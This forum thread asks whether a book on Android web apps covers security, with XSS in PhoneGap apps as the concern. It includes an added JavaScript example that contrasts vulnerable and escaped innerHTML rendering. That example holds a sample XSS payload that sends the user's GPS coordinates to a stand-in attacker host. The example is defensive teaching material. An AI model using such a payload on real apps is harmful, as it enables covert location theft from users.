Does Pro Android Web Apps cover information on security considerations when developing Android web apps?
For instance, with desktop browsers a cross-site scripting (XSS) attack can "only" steal users' credentials, port scan the internal network, perform privileged actions impersonating an authenticated user, etc., but within an Android app that uses PhoneGap, a whole range of other possibilities open up, such as meddling with the filesystem, taking pictures with the camera and posting these to the Internet, posting the user's exact location (GPS), uploading the user's contacts to a public web site, initiating calls, and other malicious things. Are there good strategies for mitigating the potential damage by an XSS attack on a PhoneGap app?
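To make the question concrete, here is an added example (not code from the book, the thread, or PhoneGap itself) of the most common way such an XSS gets into a PhoneGap WebView and the basic mitigation. It assumes a hypothetical app that fetches contact records as JSON from its server and builds list markup that is then assigned to `innerHTML`; the contact data, the `renderContact*` helpers and the hostile payload are all constructed for illustration. Markup inserted via `innerHTML` does not run `<script>` elements, but it does run inline event handlers such as `onerror`, and in the WebView that handler executes with the same access to the PhoneGap bridge (camera, geolocation, contacts, file) as the app's own JavaScript. The hardened renderer treats every server-supplied string as untrusted and HTML-escapes it before interpolation:

```javascript
// Added example: HTML-escaping untrusted data before it reaches innerHTML in a
// PhoneGap/Cordova WebView. Everything here is constructed for illustration and
// runs in plain Node.js (no DOM needed).

// Minimal entity map for the HTML text and double-quoted attribute contexts.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can change structure in HTML text/attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// VULNERABLE: server JSON is concatenated straight into markup. If `contact.name`
// carries a tag with an inline handler, assigning the result to innerHTML runs it.
function renderContactVulnerable(contact) {
  return '<li class="contact">' + contact.name + ' (' + contact.email + ')</li>';
}

// HARDENED: same markup, but every untrusted field is escaped first, so the
// payload is displayed as text instead of being parsed as an element.
function renderContactSafe(contact) {
  return (
    '<li class="contact">' + escapeHtml(contact.name) +
    ' (' + escapeHtml(contact.email) + ')</li>'
  );
}

// Very rough check used only to show the difference: does the markup still contain
// an unescaped tag with an inline event handler? (Not a sanitizer; escaping is the fix.)
function hasInlineHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed attacker-controlled record, as it might arrive from a compromised or
// spoofed API. The handler would reach navigator.geolocation via the PhoneGap bridge.
const hostileContact = {
  name: '<img src=x onerror="navigator.geolocation.getCurrentPosition(function(p){' +
        "new Image().src='http://attacker.invalid/?' + p.coords.latitude + ',' + p.coords.longitude})\">",
  email: 'alice@example.invalid',
};

// Returns both renderings so the difference can be inspected or asserted on.
function compareRenderings(contact) {
  return {
    vulnerable: renderContactVulnerable(contact),
    safe: renderContactSafe(contact),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const out = compareRenderings(hostileContact);
  console.log('vulnerable:', out.vulnerable);
  console.log('safe:      ', out.safe);
}
```

In a real WebView the same rule applies to every other sink the app uses: build elements with `document.createTextNode` / `textContent` where you can, escape where you must concatenate, and never pass server-supplied strings to `eval`, `setTimeout(string)`, or `location`. Escaping does not shrink what the bridge can do once script is running, so it complements, rather than replaces, limiting which origins the app is allowed to load and talk to.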
This isn't something that we cover specifically in the book, but I would be more than happy to blog (or write an article, see below) about it. In fact a good friend of mine will be joining me in my business pretty soon and he has extensive experience in the security space, so I would probably pick his brains or potentially even collaborate on writing that post.
In addition to the book, I plan on building up some online resources at a site I've created @ http://www.xpmobi.org/. All the content there will be Creative Commons licensed and I'm building the site using Jekyll with the intention that people can fork a GitHub repository (https://github.com/sidelab/xpmobi) and contribute articles, all while getting to write their content using Markdown.
With some of the stuff you're getting up to, Daniel, I'd certainly welcome any contributions from yourself regarding the things you are doing in the "hybrid" web app / native app space.
The site is still a work in progress, and I have to get a couple of those pages finished before the book hits the shelves...
Kind of got off topic there... sorry... I'm just really keen to see more useful information around how people can go about building cross-platform mobile apps. The book definitely captures some of that information, but there is just so much more that we can cover, as this particular thread points out.